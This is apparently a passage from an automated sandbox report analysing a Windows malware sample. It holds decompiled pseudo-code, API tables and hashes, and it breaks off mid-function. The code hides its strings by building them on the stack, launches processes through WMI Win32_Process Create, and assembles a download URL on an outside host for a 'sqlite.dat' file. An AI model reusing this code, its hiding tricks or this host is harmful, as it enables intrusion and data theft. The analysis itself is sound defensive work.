				WCHAR* _t329;
				intOrPtr* _t331;
				intOrPtr* _t332;
				intOrPtr* _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				intOrPtr* _t336;
				void* _t337;
				intOrPtr _t339;
				intOrPtr _t340;
				void* _t341;

				_t172 =  *[fs:0x0];
				 *[fs:0x0] = _t340;
				_t341 = _t340 - 0xc4;
				_t321 = _t320 | 0xffffffff;
				_v176 = 0;
				__imp__CoInitializeSecurity(0, _t321, 0, 0, 0, 3, 0, 0, 0, _t320, _t324, _t337, _t263, _t172, E00407B55, 0xffffffff);
				if(_t172 < 0) {
					L68:
					 *[fs:0x0] = _v48;
					return _v212;
				}
				_v240 = 0;
				_t174 =  &_v240;
				_v40 = 0;
				__imp__CoCreateInstance(0x408850, 0, 1, 0x40a044, _t174);
				if(_t174 < 0) {
					L42:
					_v60 = _t321;
					goto L66;
				} else {
					_v264 = 0;
					_v60 = 1;
					_v176 = 0x4f0052;
					_v172 = 0x54004f;
					_v168 = 0x43005c;
					_v164 = 0x4d0049;
					_v160 = 0x320056;
					_v156 = 0;
					_t177 = E0040225B(0xc);
					_t341 = _t341 + 4;
					_v228 = _t177;
					_v60 = 2;
					if(_t177 == 0) {
						_t178 = 0;
					} else {
						_t178 = E00401810(_t177, _t177,  &_v176);
					}
					_v60 = 1;
					_v256 = _t178;
					if(_t178 == 0) {
						E00407633(0x8007000e);
						_t178 = _v260;
					}
					_v60 = 3;
					if(_t178 == 0) {
						_t179 = 0;
					} else {
						_t179 =  *_t178;
					}
					_t268 = _v260;
					_t180 =  *((intOrPtr*)( *_t268 + 0xc))(_t268, _t179, 0, 0, 0, 0, 0, 0,  &_v264);
					E004017C0( &_v292);
					_t182 = _v300;
					if(_t180 < 0) {
						L40:
						_v96 = 0;
						if(_t182 != 0) {
							 *((intOrPtr*)( *_t182 + 8))(_t182);
						}
						goto L42;
					} else {
						__imp__CoSetProxyBlanket(_t182, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t182 < 0) {
							_t182 = _v332;
							goto L40;
						}
						_v304 = 0;
						_v308 = 0;
						_v316 = 0;
						_t328 = __imp__#2;
						_v260 = 0x720043;
						_v256 = 0x610065;
						_v252 = 0x650074;
						_v248 = 0;
						_v172 = 0x690057;
						_v168 = 0x33006e;
						_v164 = 0x5f0032;
						_v160 = 0x720050;
						_v156 = 0x63006f;
						_v152 = 0x730065;
						_v148 = 0x73;
						_t323 =  *_t328( &_v260);
						_v300 = _t323;
						_t339 =  *_t328( &_v176);
						_v152 = _t339;
						_t186 = _v340;
						_v136 = 8;
						 *((intOrPtr*)( *_t186 + 0x18))(_t186, _t339, 0, 0,  &_v312, 0);
						_t188 = _v336;
						 *((intOrPtr*)( *_t188 + 0x4c))(_t188, _t323, 0,  &_v340, 0);
						_t190 = _v360;
						 *((intOrPtr*)( *_t190 + 0x3c))(_t190, 0,  &_v368);
						_v388 =  *_t328(_v184);
						_t329 = _v184;
						_v196 = 9;
						if(_t329 != 0) {
							_push(lstrlenW(0x40a040));
							E004016C0(0x40a040);
							_push(lstrlenW(_t329));
							_t193 = E004016C0(_t329);
						}
						_v360 = 0;
						E00401770(_t193,  &_v360, _v388);
						_t195 = _v388;
						_v292 = 0x6f0043;
						_v288 = 0x6d006d;
						_v284 = 0x6e0061;
						_v280 = 0x4c0064;
						_v276 = 0x6e0069;
						_v272 = 0x65;
						_v200 = 0xa;
						 *((intOrPtr*)( *_t195 + 0x14))(_t195,  &_v292, 0,  &_v364, 0);
						_v404 = 0;
						_t197 = _v424;
						_push(0);
						_push( &_v404);
						_push(_v408);
						_push(0);
						_push(0);
						_push(_t323);
						_push(_t339);
						_push(_t197);
						_v220 = 0xb;
						if( *((intOrPtr*)( *_t197 + 0x60))() < 0) {
							_t199 = _v432;
							_v248 = 0xa;
							if(_t199 != 0) {
								 *((intOrPtr*)( *_t199 + 8))(_t199);
							}
							__imp__#9( &_v412);
							_t331 = __imp__#6;
							 *_t331(_v444);
							 *_t331(_t339);
							 *_t331(_t323);
							_t204 = _v452;
							_v264 = 5;
							if(_t204 != 0) {
								 *((intOrPtr*)( *_t204 + 8))(_t204);
							}
							_t205 = _v444;
							_v264 = 4;
							if(_t205 != 0) {
								 *((intOrPtr*)( *_t205 + 8))(_t205);
							}
							_t206 = _v440;
							_v264 = 1;
							if(_t206 != 0) {
								 *((intOrPtr*)( *_t206 + 8))(_t206);
							}
							_t207 = _v468;
							_v264 = 0;
							if(_t207 != 0) {
								 *((intOrPtr*)( *_t207 + 8))(_t207);
							}
							_t208 = _v464;
							_v264 = 0xffffffff;
							if(_t208 != 0) {
								 *((intOrPtr*)( *_t208 + 8))(_t208);
							}
							goto L68;
						}
						_v396 = 0;
						_v248 = 0xc;
						_v316 = 0x650052;
						_v312 = 0x750074;
						_v308 = 0x6e0072;
						_v304 = 0x610056;
						_v300 = 0x75006c;
						_v296 = 0x65;
						_t215 = E0040225B(0xc);
						_t341 = _t341 + 4;
						_v444 = _t215;
						_v248 = 0xd;
						if(_t215 == 0) {
							_t332 = 0;
						} else {
							_t332 = E00401810(_t215, _t215,  &_v316);
						}
						_v248 = 0xc;
						_v260 = _t332;
						if(_t332 == 0) {
							E00407633(0x8007000e);
						}
						_v248 = 0xe;
						if(_t332 == 0) {
							_v444 = 0;
						} else {
							_v444 =  *_t332;
						}
						_t216 = _v432;
						_v468 =  *((intOrPtr*)( *_t216 + 0x10))(_t216, _v444, 0,  &_v396, 0, 0);
						if(_t332 != 0) {
							E00401850(_t332);
						}
						if(_v468 < 0 || (_v412 | _v408) != 0) {
							_t333 = __imp__#9;
							 *_t333( &_v420);
							_t220 = _v460;
							_v276 = 0xa;
							if(_t220 != 0) {
								 *((intOrPtr*)( *_t220 + 8))(_t220);
							}
							 *_t333( &_v440);
							_t334 = __imp__#6;
							 *_t334(_v472);
							 *_t334(_t339);
							 *_t334(_t323);
							_t226 = _v480;
							_v292 = 5;
							if(_t226 != 0) {
								 *((intOrPtr*)( *_t226 + 8))(_t226);
							}
							_t227 = _v472;
							_v292 = 4;
							if(_t227 != 0) {
								 *((intOrPtr*)( *_t227 + 8))(_t227);
							}
							_t228 = _v468;
							_v292 = 1;
							if(_t228 != 0) {
								 *((intOrPtr*)( *_t228 + 8))(_t228);
							}
							_t229 = _v496;
							_v292 = 0;
							if(_t229 != 0) {
								 *((intOrPtr*)( *_t229 + 8))(_t229);
							}
							_v292 = 0xffffffff;
							L66:
							_t175 = _v260;
							if(_t175 != 0) {
								 *((intOrPtr*)( *_t175 + 8))(_t175);
							}
						} else {
							_t335 = __imp__#9;
							_v444 = 1;
							 *_t335( &_v420);
							_t238 = _v460;
							_v276 = 0xa;
							if(_t238 != 0) {
								 *((intOrPtr*)( *_t238 + 8))(_t238);
							}
							 *_t335( &_v440);
							_t336 = __imp__#6;
							 *_t336(_v472);
							 *_t336(_t339);
							 *_t336(_t323);
							_t244 = _v480;
							_v292 = 5;
							if(_t244 != 0) {
								 *((intOrPtr*)( *_t244 + 8))(_t244);
							}
							_t245 = _v472;
							_v292 = 4;
							if(_t245 != 0) {
								 *((intOrPtr*)( *_t245 + 8))(_t245);
							}
							_t246 = _v468;
							_v292 = 1;
							if(_t246 != 0) {
								 *((intOrPtr*)( *_t246 + 8))(_t246);
							}
							_t247 = _v496;
							_v292 = 0;
							if(_t247 != 0) {
								 *((intOrPtr*)( *_t247 + 8))(_t247);
							}
							_t248 = _v492;
							_v292 = 0xffffffff;
							if(_t248 != 0) {
								 *((intOrPtr*)( *_t248 + 8))(_t248);
							}
						}
						goto L68;
					}
				}
			}

0x00401057
0x0040105e
0x00401065
0x00401078
0x0040107e
0x00401082
0x0040108a
0x00401687
0x00401696
0x004016a3
0x004016a3
0x00401090
0x00401094
0x00401098
0x004010ad
0x004010b5
0x00401521
0x00401521
0x00000000
0x004010bb
0x004010bb
0x004010c1
0x004010c9
0x004010d1
0x004010d9
0x004010e1
0x004010e9
0x004010f1
0x004010f8
0x004010fd
0x00401100
0x00401106
0x0040110e
0x0040111e
0x00401110
0x00401117
0x00401117
0x00401122
0x0040112a
0x0040112e
0x00401135
0x0040113a
0x0040113a
0x00401140
0x00401148
0x0040114e
0x0040114a
0x0040114a
0x0040114a
0x00401150
0x00401163
0x0040116c
0x00401171
0x00401177
0x00401510
0x00401512
0x00401519
0x0040151e
0x0040151e
0x00000000
0x0040117d
0x00401188
0x00401190
0x0040150c
0x00000000
0x0040150c
0x00401196
0x0040119a
0x0040119e
0x004011a2
0x004011ad
0x004011b5
0x004011bd
0x004011c5
0x004011c9
0x004011d4
0x004011df
0x004011ea
0x004011f5
0x00401200
0x0040120b
0x00401218
0x0040121a
0x00401228
0x0040122a
0x00401231
0x00401241
0x00401249
0x0040124c
0x0040125b
0x0040125e
0x0040126b
0x00401278
0x0040127c
0x00401283
0x0040128d
0x0040129a
0x004012a4
0x004012b0
0x004012b6
0x004012b6
0x004012bf
0x004012c9
0x004012ce
0x004012e4
0x004012ef
0x004012fa
0x00401305
0x00401310
0x0040131b
0x00401327
0x0040132f
0x00401332
0x00401336
0x0040133e
0x0040133f
0x00401346
0x00401347
0x00401348
0x00401349
0x0040134a
0x0040134b
0x0040134c
0x00401359
0x0040152d
0x00401531
0x0040153b
0x00401540
0x00401540
0x00401548
0x00401552
0x00401559
0x0040155c
0x0040155f
0x00401561
0x00401565
0x0040156f
0x00401574
0x00401574
0x00401577
0x0040157b
0x00401585
0x0040158a
0x0040158a
0x0040158d
0x00401591
0x0040159b
0x004015a0
0x004015a0
0x004015a3
0x004015a7
0x004015b0
0x004015b5
0x004015b5
0x004015b8
0x004015bc
0x004015c9
0x004015d2
0x004015d2
0x00000000
0x004015c9
0x0040135f
0x00401366
0x0040136e
0x00401379
0x00401384
0x0040138f
0x0040139a
0x004013a5
0x004013ac
0x004013b1
0x004013b4
0x004013ba
0x004013c2
0x004013d7
0x004013c4
0x004013d3
0x004013d3
0x004013db
0x004013e3
0x004013ea
0x004013f1
0x004013f1
0x004013f8
0x00401400
0x0040140a
0x00401402
0x00401404
0x00401404
0x0040140e
0x00401427
0x0040142b
0x0040142f
0x0040142f
0x00401438
0x004015da
0x004015e5
0x004015e7
0x004015eb
0x004015f5
0x004015fa
0x004015fa
0x00401602
0x00401608
0x0040160f
0x00401612
0x00401615
0x00401617
0x0040161b
0x00401625
0x0040162a
0x0040162a
0x0040162d
0x00401631
0x0040163b
0x00401640
0x00401640
0x00401643
0x00401647
0x00401651
0x00401656
0x00401656
0x00401659
0x0040165d
0x00401666
0x0040166b
0x0040166b
0x0040166e
0x00401679
0x00401679
0x0040167f
0x00401684
0x00401684
0x0040144e
0x0040144e
0x00401459
0x00401461
0x00401463
0x00401467
0x00401471
0x00401476
0x00401476
0x0040147e
0x00401484
0x0040148b
0x0040148e
0x00401491
0x00401493
0x00401497
0x004014a1
0x004014a6
0x004014a6
0x004014a9
0x004014ad
0x004014b7
0x004014bc
0x004014bc
0x004014bf
0x004014c3
0x004014cd
0x004014d2
0x004014d2
0x004014d5
0x004014d9
0x004014e2
0x004014e7
0x004014e7
0x004014ea
0x004014ee
0x004014fb
0x00401504
0x00401504
0x004014fb
0x00000000
0x00401438
0x00401177

APIs

CoInitializeSecurity.OLE32(00000000,00610064,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00610064,73BB82B0,002F0074,00000000), ref: 00401082
CoCreateInstance.OLE32(00408850,00000000,00000001,0040A044,?), ref: 004010AD
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00401188
SysAllocString.OLEAUT32(?), ref: 00401216
SysAllocString.OLEAUT32(?), ref: 00401226
lstrlenW.KERNEL32(0040A040), ref: 00401294

Part of subcall function 004016C0: SysAllocStringLen.OLEAUT32(00000000,?), ref: 004016E7

lstrlenW.KERNEL32(?,0040A040,00000000), ref: 004012AA

Part of subcall function 004016C0: SysStringLen.OLEAUT32(00000000), ref: 004016D2
Part of subcall function 004016C0: SysFreeString.OLEAUT32(?), ref: 00401741

SysAllocString.OLEAUT32(?), ref: 00401276

Part of subcall function 00401810: SysAllocString.OLEAUT32(?), ref: 00401827

VariantClear.OLEAUT32(?), ref: 00401461
VariantClear.OLEAUT32(?), ref: 0040147E
SysFreeString.OLEAUT32(?), ref: 0040148B
SysFreeString.OLEAUT32(00000000), ref: 0040148E
SysFreeString.OLEAUT32(00000000), ref: 00401491
VariantClear.OLEAUT32(?), ref: 00401548
SysFreeString.OLEAUT32(?), ref: 00401559
SysFreeString.OLEAUT32(00000000), ref: 0040155C
SysFreeString.OLEAUT32(00000000), ref: 0040155F
VariantClear.OLEAUT32(?), ref: 004015E5
VariantClear.OLEAUT32(?), ref: 00401602
SysFreeString.OLEAUT32(?), ref: 0040160F
SysFreeString.OLEAUT32(00000000), ref: 00401612
SysFreeString.OLEAUT32(00000000), ref: 00401615

Strings

\, xrefs: 004010D9
d, xrefs: 00401305
R, xrefs: 0040136E
C, xrefs: 004012E4
a, xrefs: 004012FA
r, xrefs: 00401384
V, xrefs: 0040138F
R, xrefs: 004010C9
V, xrefs: 004010E9
I, xrefs: 004010E1
2, xrefs: 004011DF
n, xrefs: 004011D4
s, xrefs: 0040120B
e, xrefs: 004011B5
l, xrefs: 0040139A
t, xrefs: 00401379
m, xrefs: 004012EF
O, xrefs: 004010D1
W, xrefs: 004011C9
o, xrefs: 004011F5
t, xrefs: 004011BD
P, xrefs: 004011EA
e, xrefs: 00401200
C, xrefs: 004011AD
i, xrefs: 00401310

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$AllocClearVariant$lstrlen$BlanketCreateInitializeInstanceProxySecurity
String ID: 2$C$C$I$O$P$R$R$V$V$W$\$a$d$e$e$i$l$m$n$o$r$s$t$t
API String ID: 1217749482-3083329441
Opcode ID: f6c38d306354a0b32987e32ac5e52a42e760a99a2cf686b41c5da790ca8eb103
Instruction ID: 10021222e56d23b629cf2bc6b0615b58b4580843e3adea8eb922f56a67540d35
Opcode Fuzzy Hash: f6c38d306354a0b32987e32ac5e52a42e760a99a2cf686b41c5da790ca8eb103
Instruction Fuzzy Hash: E1024D70508381DFD720CF65C888B5BBBE8BF89308F14496EF589AB291C7799845CF66

Uniqueness

Uniqueness Score: -1.00%

Function 004048ED, Relevance: .3, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004048ED(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
							_t221 =  !(0x80000000 >> _t250);
							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}

0x004048f3
0x004048fc
0x00404907
0x0040490a
0x0040490d
0x0040491f
0x00404925
0x00404928
0x0040492b
0x0040492f
0x00404933
0x00404936
0x00404a9b
0x00404aa1
0x00404aa4
0x00404aa7
0x00404aaa
0x00404aad
0x00404ab4
0x00404aba
0x00404abb
0x00404abe
0x00404ac1
0x00404ac5
0x00404ac5
0x00404ac6
0x00404aca
0x00404ad6
0x00404ad7
0x00404ada
0x00404ade
0x00404ade
0x00404ae2
0x00404ae5
0x00404ae7
0x00404aea
0x00404b0a
0x00404b14
0x00404b14
0x00404b18
0x00404b1a
0x00404b21
0x00404b21
0x00404b23
0x00404b25
0x00404b28
0x00404b28
0x00404b28
0x00404b28
0x00404aec
0x00404af5
0x00404af9
0x00404afb
0x00404aff
0x00404aff
0x00404b01
0x00404b06
0x00404b06
0x00404b01
0x00404b2b
0x00404b2b
0x00404b34
0x00404b3d
0x00404b43
0x00404b46
0x00404b4c
0x00404b4d
0x00404b50
0x00404b54
0x00404b54
0x00404b50
0x00404b55
0x00404b5c
0x00404b5f
0x00404b62
0x00404b65
0x00404b6b
0x00404b71
0x00404b74
0x00404b76
0x00404b7a
0x00404b7d
0x00404b80
0x00404b80
0x00404b82
0x00404b86
0x00404ba9
0x00404bad
0x00404bb9
0x00404bbc
0x00404bbc
0x00404bbc
0x00404bbc
0x00404bbf
0x00404bc6
0x00404bc9
0x00404b88
0x00404b88
0x00404b8c
0x00404b97
0x00404b9a
0x00404b9a
0x00404b9a
0x00404b9c
0x00404ba0
0x00404ba5
0x00404ba5
0x00404bd0
0x00404bd0
0x00404bd0
0x00404bd2
0x00404bd5
0x00404bd7
0x00404bd7
0x00404bdb
0x00404bdd
0x00000000
0x00404bdd
0x0040493f
0x00000000
0x0040494f
0x00404955
0x00404959
0x0040495c
0x00404960
0x00404961
0x00404961
0x0040496a
0x0040496f
0x0040499d
0x004049a1
0x004049a3
0x004049aa
0x004049aa
0x004049ac
0x004049ae
0x004049b1
0x004049b1
0x004049b1
0x004049b1
0x00404971
0x0040497b
0x0040497f
0x00404981
0x00404985
0x00404987
0x0040498c
0x0040498c
0x00404987
0x0040496f
0x004049ba
0x004049c3
0x004049cb
0x004049d2
0x00404a82
0x004049d8
0x004049e1
0x004049e2
0x004049e9
0x004049ed
0x004049ed
0x004049f1
0x004049f4
0x004049fa
0x004049fd
0x00404a00
0x00404a03
0x00404a09
0x00404a12
0x00404a14
0x00404a1b
0x00404a1e
0x00404a20
0x00404a24
0x00404a47
0x00404a4b
0x00404a4d
0x00404a57
0x00404a5a
0x00404a5a
0x00404a5a
0x00404a5a
0x00404a5d
0x00404a64
0x00404a64
0x00404a67
0x00404a26
0x00404a2a
0x00404a38
0x00404a38
0x00404a3a
0x00404a3e
0x00404a43
0x00404a43
0x00404a6e
0x00404a6e
0x00404a70
0x00404a73
0x00404a76
0x00404a7a
0x00404a7c
0x00404a7c
0x00404a85
0x00404a88
0x00404a8b
0x00000000
0x00404a8b

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: 3b5296033baacfac2efda97847c6edef399ae63c2ce524e50002220949bcfe8b
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: 7BB17EB5A00206DFDB15CF14C5D0AA9BBA1FB88318F14C1AED95A5B382D735FE42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401FD0, Relevance: 73.6, APIs: 3, Strings: 39, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00401FD0() {
				short _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				short _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				short _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				short _v700;
				short _v704;
				short _v708;
				short _t56;
				void* _t62;
				void* _t64;
				short _t67;
				short* _t76;

				_t76 =  &_v708;
				goto L1;
				do {
					do {
						L1:
						_t56 = L"29"; // 0x390032
						_t67 =  *0x40a0d4; // 0x0
						_v708 = _t56;
						_v676 = 0x740068;
						_v672 = 0x700074;
						_v668 = 0x3a0073;
						_v664 = 0x2f002f;
						_v660 = 0x2e0061;
						_v656 = 0x6f0067;
						_v652 = 0x740061;
						_v648 = 0x610067;
						_v644 = 0x65006d;
						_v640 = 0x63002e;
						_v636 = 0x2f006f;
						_v632 = 0x730075;
						_v628 = 0x720065;
						_v624 = 0x2f0066;
						_v620 = 0x610064;
						_v616 = 0x2f0074;
						_v612 = 0;
						_v704 = _t67;
						_v700 = 0x73002f;
						_v696 = 0x6c0071;
						_v692 = 0x740069;
						_v688 = 0x2e0065;
						_v684 = 0x610064;
						_v680 = 0x74;
